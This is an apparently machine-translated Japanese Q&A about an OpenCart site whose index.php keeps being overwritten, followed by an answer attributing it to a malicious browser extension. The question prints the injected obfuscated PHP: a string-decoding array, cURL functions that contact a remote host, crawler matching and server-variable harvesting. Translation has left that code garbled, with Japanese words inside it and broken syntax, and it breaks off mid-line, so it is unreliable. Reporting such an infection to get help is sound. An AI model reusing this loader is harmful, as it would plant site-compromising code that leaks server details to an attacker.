Opencartのindex.phpファイルが破損しています

Question

opencart v3.0.2.0 を使用していますが、問題は、opencart のindex.php ファイル (public_html ディレクトリにアップロードされた、私の opencart Web サイトへのエントリ ポイント) がクラッシュすることです (index.php ファイル内のコードは変な文字に変わってしまいました）。 先週はこのようなことが２回ありました。誰かがハッキングされたことも、私のドメインやコードに何か問題があることも知りませんでした。 誰かが私を助けたり指導したりできる場合は、私に知らせてください。 ありがとう。

破損したindex.phpファイル:

グローバル $O; $O=url デコード ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]。 $AO[67].$AO[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOOOOOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOOooOo,CURLOPT_URL,$ooooOOOoOoo);curl_setopt ($ooooOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOooOo);curl_close($ooooOOOOooOo);return $ooooOOOOooO; } 関数 ooOOOOOOO($Ooooo O,$O)おおおお= array()){ グローバル $O;$OooooO=str_replace(' ',' ',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER) . ry($OOOOoo ));$OOOOooo=curl_exec($OOooooO);$OOOOoooo=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ; } function oooOOOOo($ ooOOo){global $O;$ooOOOOo = false;$ooooooOOo = $O[14].$O[8].$O[8].$O[14]. $O[18]. $O[2] .$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O [14].$ O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8 ].$O[ 90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10]. $O[8] . $O[18] ;if ($ooOOOO!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} returns $ooOOOOo;} function oooOOooOOOOOO ( $oOOOOOOoOOOO){グローバル $O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2 ].$O[ 59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[5]. $O[10] .$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O [16].$ O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2 ].$O[ 59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO ) ) {$ooOOOOOOoO= true;}$ooOOOOOOoO を返します;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30]).$O[30].$O[ 35].$O [ 37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[ 13].$O [13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63 ].$O[ 63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63]. $O[63] ) ;$oOoooOOoOO=$ _SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30]。$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOooooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOooooOOOOoOO=$oOooOOoOO.$ooOOooooOOoOO.$oOooooOOoOO;$oooOOOOooooOOOOOOOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOOOOO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$ooooOOooooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O

Answer 1

私は最近、クライアントの 1 人で同様の問題に遭遇しました。調査した結果、この問題は、php# をアップロードするときに PHP ファイルにコードを挿入する Chrome ブラウザ拡張機能によって引き起こされていることがわかりました。 (Cpanel File Management など) ブラウザ経由で ## ファイルを実行します。この場合、コードは index.php ファイルに挿入され、誰かが URL 経由でそのファイルにアクセスすると、悪意のあるコードの挿入が開始されます。ファイルをサーバーにアップロードし、新しいファイルを作成し、PHP. の cURL 関数を使用してサーバーの現在の URL とその他のデータをハッカーに通知します。

この問題を解決するには、次の手順を実行できます:

1- サーバーにファイルをアップロードするために使用されているブラウザーの拡張機能のスクリーンショットを撮り、それを私たちと共有してから、ブラウザーまたはそのすべての拡張機能を削除します。

2- ハッキングの日以降にサーバーにアップロードまたは更新されたすべてのファイルを確認します。サーバー上でコマンドを実行すると、オペレーティング システムに応じて、新しいファイルまたは更新されたファイルのリストを取得できます。

3- サーバー上の

.well-known またはその他の隠しフォルダーに *.php ファイルがいくつかある場合があります。 4- ウイルス対策ソフトウェアを使用してオペレーティング システムを保護します。 Kaspersky などの非フリーのウイルス対策ソフトウェアを使用することをお勧めします。

どの拡張機能がサイトのハッキングを引き起こしたのかを判断できるよう、ブラウザ拡張機能のスクリーンショットを共有していただけますか?